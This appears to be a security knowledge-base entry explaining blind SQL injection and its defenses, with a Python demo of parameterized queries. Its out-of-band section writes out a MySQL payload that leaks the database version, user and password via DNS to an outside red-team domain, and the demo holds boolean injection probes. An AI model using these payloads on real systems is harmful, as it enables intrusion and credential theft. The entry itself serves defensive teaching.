Blind SQL Injection

Critical

Description

Blind SQL Injection is a type of SQL Injection that exists when the application does not directly return the result of the SQL query to the front end. Unlike in-band SQL Injection, the injected query produces no direct output in the application, so it typically takes the attacker longer to exploit. Blind SQL Injection has three types:

  • Boolean-Based (Content-Based) Blind SQLi: this technique asks the database TRUE or FALSE questions and determines the answer from the application's response. Depending on the result, the content of the HTTP response either changes or remains the same.

  • Time-Based SQLi: this technique injects a payload containing a time-intensive operation and checks whether the request-response is delayed; a boolean condition decides whether the delay is performed or not. The main drawback of this type is that it requires a stable network connection to tell a delayed response from a normal one and extract data correctly.

  • Out-of-Band (OOB) SQLi: this technique uses external resources to exfiltrate data from the database by making the database server perform HTTP or DNS requests to an external server. The main drawback is that it depends on the database system's ability to initiate outbound DNS or HTTP requests, which may rely on the functions available in that database.

Attack Scenario

In the case of Boolean-Based SQLi, the attacker sends different SQL queries that ask the database TRUE or FALSE questions, then analyzes the differences between the responses to TRUE and FALSE statements; this is called a 'Conditional Response'. Sometimes the TRUE/FALSE indicator is not based on what the query returns but on whether the query executes without error; in that case it is called a 'Conditional Error'.

Boolean-Based SQLi Data Exfiltration

  • Conditional Response: boolean checks are performed on conditions to extract the content of the database, for example a condition that evaluates to TRUE or FALSE depending on whether the first table name starts with the character 'A', and so on, until the attacker has extracted all the content of the database with the help of functions such as SUBSTR() and internal database structures such as information_schema. The data is extracted by inspecting the application's response and distinguishing TRUE from FALSE statements.

  • Conditional Errors: boolean checks are performed on conditions to extract the content of the database, for example a condition that causes a database error using 'to_char(1/0)' if the first table name starts with the character 'A', and so on, until the attacker has extracted all the content of the database with the help of functions such as SUBSTR() and internal database structures such as information_schema. The data is extracted by inspecting the application's response and distinguishing TRUE from FALSE statements based on whether an error occurred or not.

In the case of Time-Based SQLi, the attacker makes the database perform a time-intensive operation. If the website does not return a response immediately, the web application is vulnerable to Blind SQL Injection. A popular time-intensive operation is the sleep operation.

Time-Based SQLi Data Exfiltration

  • Boolean checks are performed on conditions to extract the content of the database, for example a condition that causes a sleep if the first table name starts with the character 'A', and so on, until the attacker has extracted all the content of the database with the help of functions such as SUBSTR() and internal database structures such as information_schema. The data is extracted by inspecting the application's response time to determine whether the condition is TRUE or FALSE.

In the case of Out-of-Band (OOB) SQLi, the attacker makes the database perform external requests to an attacker-controlled server to confirm that the vulnerability exists; the most common request types are HTTP and DNS.

Out-of-Band (OOB) SQLi Data Exfiltration

  • Via DNS: The attacker makes the database perform a DNS request to the domain securitymeter-redteam.com with the exfiltrated data placed in the subdomain, for example using the following query (MySQL):

```
SELECT load_file(CONCAT('\\', (SELECT @@version), '.', (SELECT user), '.', (SELECT password), '.', 'securitymeter-redteam.com\SMVDB.txt'))
```

This causes the database to perform a DNS request for the name database_version.database_user.database_password.securitymeter-redteam.com, exposing the database version, username, and password to the attacker.

  • Via HTTP: The attacker makes the database perform an HTTP request to the domain securitymeter-redteam.com with the exfiltrated data sent as GET parameters, for example using the UTL_HTTP package if the database is Oracle.

Mitigation

Main Defenses

  • Use prepared statements (with Parameterized Queries)
  • Whitelist input validation
  • Escape user-supplied input
  • Use Properly Constructed Stored Procedures

Additional Defenses

  • Enforce Least Privilege
  • Prevent the database from initiating outbound HTTP requests and DNS requests if possible.
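An added example (not part of this entry) in Python with sqlite3 showing why the first two main defenses matter for the Boolean-Based case: the concatenated query answers a TRUE condition and a FALSE condition differently, which is the oracle the attack relies on, while the parameterized query treats the whole input as a literal and returns the same response for both; the sort-column allowlist is there because placeholders cannot bind identifiers. The table, rows and function names are constructed for the demonstration.

```python
import sqlite3

# Constructed sample schema and rows for this demonstration; not from the page.
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER, username TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)", [(1, "alice"), (2, "bob")])
    return conn

def lookup_vulnerable(conn, username):
    # Query text is built by concatenation, so the input is parsed as SQL.
    sql = "SELECT id FROM users WHERE username = '" + username + "'"
    return [row[0] for row in conn.execute(sql)]

# Placeholders cannot bind identifiers, so the sort column is checked
# against a fixed allowlist (whitelist input validation) before use.
ALLOWED_SORT_COLUMNS = {"id", "username"}

def lookup_safe(conn, username, sort_by="id"):
    if sort_by not in ALLOWED_SORT_COLUMNS:
        raise ValueError("unexpected sort column: %r" % sort_by)
    # The value is bound as a parameter: the driver hands it to the engine
    # as data, never as part of the statement text.
    sql = "SELECT id FROM users WHERE username = ? ORDER BY " + sort_by
    return [row[0] for row in conn.execute(sql, (username,))]

# Boolean-based blind SQLi needs an oracle: a TRUE condition and a FALSE
# condition must produce observably different responses.
TRUE_PROBE = "alice' AND '1'='1"
FALSE_PROBE = "alice' AND '1'='2"

def has_boolean_oracle(lookup):
    conn = make_db()
    return lookup(conn, TRUE_PROBE) != lookup(conn, FALSE_PROBE)

def demo():
    # Reports whether each implementation leaks a TRUE/FALSE distinction.
    return {
        "vulnerable": has_boolean_oracle(lookup_vulnerable),  # True: [1] vs []
        "safe": has_boolean_oracle(lookup_safe),              # False: [] vs []
    }

if __name__ == "__main__":
    print(demo())
```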

ID: 40002